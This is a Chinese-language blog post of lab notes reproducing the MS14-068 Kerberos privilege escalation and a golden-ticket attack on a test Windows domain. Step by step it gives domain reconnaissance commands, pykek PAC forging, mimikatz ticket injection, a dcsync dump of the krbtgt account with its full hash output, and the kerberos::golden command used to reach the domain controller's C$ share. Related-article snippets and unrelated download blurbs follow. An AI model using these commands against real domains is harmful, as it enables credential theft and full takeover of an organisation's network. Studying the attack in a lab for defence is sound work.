#kerberos#WHoami#MS14-068#黄金票据

已于 2025-05-13 12:40:08 修改
阅读量581 收藏 10
点赞数 22
分类专栏: 内网渗透 文章标签: 普通票据 黄金票据 MS14-068与PAC的利用 Golden-Tricket 权限维持
于 2025-05-12 12:42:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75258001/article/details/147894142
版权

Win 08 

hostname 

WIN-8RSOOTMELL5

net time /domain

net user /domain 

Win10  

net time /domain

net user /domain 

hostname

ping WIN-8RSOOTMELL5

ping WIN-8RSOOTMELL5.test.com

net group "domain controllers" /domain

whoami /all

whoami /user

S-1-5-21-2956900695-284735896-1535289670-500 

(wi10和win08都是这个SID,固定不变,无关网络,黄金票据只用到黄色部分)

MS14-068

连接配置 

打开wireshark,选择VMnet8,过滤kerberos,方便记录和排查 

选择KRB_AS_REQ,记得按掉include-pac,下面那个rc4hmac也要勾选

发包之后,在wireshark里确保include是False

解密之后,双击右键复制authime

20250511114427Z

cd pykek-master
vi pac.py
python2 pac.py
ls -llart

test.com

krbuser

S-1-5-21-2956900695-284735896-1535289670-500 

每次只改时间20250511114427Z

python2 pac.py

把kbs.pac放在win10桌面,导入TGT和PAC

将上面的命令行改为11,复制到mimikatz文件夹里,输入cmd打开命令行

mimikatz.exe

kerberos::purge

kerberos::ptt 11.kirbi

misc::cmd

klist

dir \\WIN-8RSOOTMELL5.test.com\c$

黄金票据   

lsadump::dcsync /user:krbtgt

其结果保持不变

mimikatz # lsadump::dcsync /user:krbtgt
[DC] 'test.com' will be the domain
[DC] 'WIN-8RSOOTMELL5.test.com' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 2025/5/9 14:57:50
Object Security ID   : S-1-5-21-2956900695-284735896-1535289670-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 025081f26ff25a9147ccc9d87bccc951
    ntlm- 0: 025081f26ff25a9147ccc9d87bccc951
    lm  - 0: bf1726c841e5628b38663466e5342655

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : TEST.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 98144ed5fe3b4a2240e23ca2e0a62e4a7f782cf5fc2e0596724df4b60e8fa12b
      aes128_hmac       (4096) : 33b18ef4acc4b07ba28b7cb74c3e865e
      des_cbc_md5       (4096) : 38d0c4312667abfb

* Primary:Kerberos *
    Default Salt : TEST.COMkrbtgt
    Credentials
      des_cbc_md5       : 38d0c4312667abfb

* Packages *
    Kerberos-Newer-Keys

* Primary:WDigest *
    01  335c5ccf40a507955049abe3a56d8900
    02  53305a2d3f289555ec2d2bc44762301d
    03  cc160e48710820f5573a396ae7580d8a
    04  335c5ccf40a507955049abe3a56d8900
    05  53305a2d3f289555ec2d2bc44762301d
    06  19c4f422cc34ab42ad9d8e87c817d2e6
    07  335c5ccf40a507955049abe3a56d8900
    08  bfde0675a0cb9286b82eeeef2ef79da4
    09  bfde0675a0cb9286b82eeeef2ef79da4
    10  5a870d44d4ad29795d3cf8b40ffa522b
    11  67c452beb4d275ecbbec37e26675d7df
    12  bfde0675a0cb9286b82eeeef2ef79da4
    13  1794c6f00059175ee2cc2d2ce709a8f4
    14  67c452beb4d275ecbbec37e26675d7df
    15  0be2feca8fc1e01e91e3381bc4f99e13
    16  0be2feca8fc1e01e91e3381bc4f99e13
    17  25d3d7979eaba9b30e801d1fc916336b
    18  eb95942676a20f95214826b8a77ccc4e
    19  ddc51cd749b0d2fe7b9dea182f763d74
    20  ed93d1c18dc56ffe1ed47ffa08126920
    21  c3ab83bb6ac0ab4d41d2e49f3729a16d
    22  c3ab83bb6ac0ab4d41d2e49f3729a16d
    23  a312eb6d72d8aee4a16dce373c3273dd
    24  b7d352dbe3b43983cc6643b55e7d695f
    25  b7d352dbe3b43983cc6643b55e7d695f
    26  410b8667ff39b80a8b78441f92c7bceb
    27  6fb489d799021cc0463ac0986bf9e423
    28  406ec7e12f36aeece2fbc7e434d8d346
    29  6bb2a8747c1d48118ff3c023ce9c633d

kerberos::purge

kerberos::golden /domain:test.com /sid:S-1-5-21-2956900695-284735896-1535289670 /aes256:98144ed5fe3b4a2240e23ca2e0a62e4a7f782cf5fc2e0596724df4b60e8fa12b /user:administrator /ticket:golden.kirbi

(这条命令固定不变,sid只用到-502前面的那一部分,golen.kirbi可以自己命名)

kerberos::ptt golden.kirbi

misc::cmd

klist

dir \\WIN-8RSOOTMELL5.test.com\c$

MS14-068 (CVE-2014-6324)域用户提权漏洞
李火火的安全圈
03-15 7817
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升,升级为域管理员权限。 二、漏洞原理 Kerberos认证原理:http
内网安全之:Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324)
f_carey的博客
12-08 2039
郑重声明: 本笔记编写目的只用于安全知识提升,并更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Kerberos 域用户提权漏洞(MS14-068;CVE-2014-63241 pyKEK 工具包2 MSF 中 ms14_068 利用3 goldenPac.py4 防范 Kerberos MS14-068 漏洞 Microsoft Security Bulletin MS14-068 - Critical.
域渗透- MS14-068域提权
zj2084的博客
04-07 923
微软在Windows平台上对Kerberos协议进行了一些扩充,其中最重要的扩充就是增加了认证过程中的权限认证,也就是在协议中增加了PAC(Privilege Attribute Certificate),特权属性证书在一个域中,通过User的SID和所在组Group的SID来确定该用户所拥有的权限。所以PAC包含Client的User的SID、Group的SID。PAC为了保证自身的合法性,还包含2个签名。
MS-14-068域渗透
ygylemon的博客
12-04 521
它描述了一个存在于 Windows SMB(Server Message Block)协议中的重要漏洞。这个漏洞可能允许远程攻击者在无需用户交互的情况下执行任意代码,从而完全控制受影响的系统。SMB 是一种网络协议,用于在节点之间提供共享访问文件、打印机、串行端口和其他资源。当这个漏洞被利用时,攻击者可以发送特制的数据包到易受攻击的 SMB 服务上,这可能会导致远程代码执行。准备好MS-14-068和mimikatz以及psexec。
渗透测试中的域渗透之MS14-068域控提权+票据传递攻击PTT
没有网络安全就没有国家安全
03-13 692
渗透测试中的域渗透之MS14-068域控提权+票据传递攻击PTT
复现MS14-068
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
05-23 1182
MS14-068
MS14-068 权限提升漏洞域内网渗透 背景以及漏洞原理介绍 以及漏洞抓包分析整个过程详解 涉及到Kerberos协议票据认证过程
热门推荐
浩策盾悟
11-29 1万+
最后将加密后的数据放在req-body 的enc-authorization-data中发送TGS-REQ包给KDC的TGS服务。
MS14-068漏洞复现
qq_56426046的博客
11-11 3397
(身份认证票据黄金票据是伪造票据授予票据(TGT),也被称为认证票据。这里利用 MS14-068 来提权,先检查下是否有 MS14-068, CVE 编号CVE-2014-6324, 补丁为 3011780 : systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在漏洞,需要注意的是域内普通用户提权成功后是有时效性的。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。
黄金白银票据的伪造以及ms14-068的使用(域渗透)
weixin_45612728的博客
02-06 3745
以下实验使用到的软件有mimikatz和psexec软件.使用的到的pc有一台win7的计算机和一台域控的08服务器.注意:win7的计算机以普通的域用户添加到cyh.com域环境中.08服务器的ip地址为:192.168.0.222,dns:192.168.0.222,网关:192.168.0.2 1. 黄金票据的伪造 黄金票据其实就是伪造tgt的,关于什么是tgt请看我之前的博客,tgt也有人称是通票. 实验步骤: 1.1前提 需要域的sid和tgt的hahs值 1.2 获取域控的的hash值,需要在域
MS14-068
u013622866的博客
03-26 764
漏洞说明 该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 漏洞原理 https://www.cnblogs.com/huamingao/p/7267423.html ​Kerberos在古希腊神话中是指:一只有三个头的狗。这条狗守护在地狱之门外,防止活人闯入。Kerberos协议以此命名,因为协议的重要组成部分也是三个:client, server, KDC...
内网拓展——域渗透之ms-14-068利用
cxrpty的博客
03-30 1329
实验条件: 1.必须知道域 2.必须知道域的账号密码 3.sid 4.域控 实验步骤: 一、利用ms-14-068漏洞进行票据伪造 1.获取普通域用户的sid whoami /all 2.获取域名和域控名 ipconfig /all net view /domain或net time /domain 3.上传14068py.exe,输入命令进行票据伪装,生成...
lucene-sandbox-7.2.1.jar中文文档.zip
05-13
# 压缩文件中包含: 中文文档 jar包下载地址 Maven依赖 Gradle依赖 源代码下载地址 # 本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册 # 使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 # 特殊说明: ·本文档为人性化翻译,精心制作,请放心使用。 ·只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; ·不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 # 温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件;
groovy-all-2.5.0-beta-2.jar中文-英文对照文档.zip
05-13
# 压缩文件中包含: 中文-英文对照文档 jar包下载地址 Maven依赖 Gradle依赖 源代码下载地址 # 本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册 # 使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 # 特殊说明: ·本文档为人性化翻译,精心制作,请放心使用。 ·只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; ·不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 # 温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件;
h2-1.3.176.jar中文文档.zip
05-13
# 压缩文件中包含: 中文文档 jar包下载地址 Maven依赖 Gradle依赖 源代码下载地址 # 本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册 # 使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 # 特殊说明: ·本文档为人性化翻译,精心制作,请放心使用。 ·只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; ·不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 # 温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件;
深刻理解VXLAN 大二层:H3C实验分析实战分享
05-13
Vxlan大二层配置
基于巴氏系数的协同过滤算法.zip
05-13
解压密码666666
工程领域二维巷道开挖模型文件的研究应用
05-13
内容概要:本文详细解析了二维巷道开挖模型文件的概念、组成及其在工程项目中的应用。首先介绍了模型文件作为地下工程设计和施工重要依据的作用,接着阐述了其由图形数据(如平面图、剖面图)、参数数据(如尺寸、坡度、支护结构)和文本数据组成的结构特点。随后探讨了模型文件在工程设计、施工指导和安全评估等方面的具体应用场景,强调其对提高设计效率、施工质量和安全性的重要意义。最后展望了未来计算机技术和大数据背景下,模型文件制作和应用的发展趋势。 适合人群:从事地下工程设计和施工的工程师和技术人员。 使用场景及目标:帮助工程师和技术人员更好地理解和应用二维巷道开挖模型文件,从而提升工程项目的规划、实施和安全管理效率。 其他说明:随着科技的进步,未来的模型文件将更加强调数据的实时性和动态性,借助人工智能和大数据技术,使分析和评估更为精准全面。
基于复杂网络理论的运载器产品装配过程资源可靠性分析.zip
最新发布
05-13
基于复杂网络理论的运载器产品装配过程资源可靠性分析.zip
MS14-068漏洞
12-31
### MS14-068 漏洞详情 MS14-068 是一个存在于 Microsoft Windows Kerberos Key Distribution Center (KDC) 的安全漏洞,编号为 CVE-2014-6324。此漏洞允许攻击者通过伪造 Kerberos 票据授予票据(Ticket Granting Ticket, TGT),从而将普通域用户的权限提升至域管理员级别[^2]。 具体来说,在未修补的环境中,如果攻击者拥有某个合法域账户的凭证以及目标系统的SID,则可以利用专门工具执行命令来创建并提交虚假的TGT请求给KDC服务端,进而获得对整个活动目录森林中资源不受限访问的能力[^3]。 ### 影响范围危害程度 该缺陷影响所有版本的 Windows Server,并且由于其能够绕过正常的认证机制实现特权升级操作,因此被评估具有较高的危险等级。一旦成功实施攻击,不仅单个受感染主机面临风险,就连整个企业内部网络也可能遭受严重影响甚至全面失控的局面。 ### 利用条件 为了有效触发这一问题,通常需要满足以下几个前提: - **获取初始立足点**:掌握某位正式注册于AD下的成员账号及其对应哈希值或明文口令; - **具备适当工具集**:运用特定编程脚本或者第三方软件包辅助完成实际入侵流程中的各项技术动作; 值得注意的是,上述每一步都存在一定难度和技术门槛,但在某些情况下仍有可能被恶意行为体所突破。 ### 修复措施建议 针对此类安全隐患最直接有效的应对策略就是尽快安装由官方提供的累积安全性更新程序KB3011780,它包含了对于此次事件的核心修正逻辑,能从根本上杜绝同类威胁再次发生的可能性。 另外还应加强日常安全管理实践,比如定期审查用户授权情况、启用强密码策略、部署多因素验证设施等手段提高整体防护水平,减少潜在损失发生的几率。 ```bash # 使用Windows Update自动下载并安装最新补丁 wuauclt /detectnow /updatenow ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值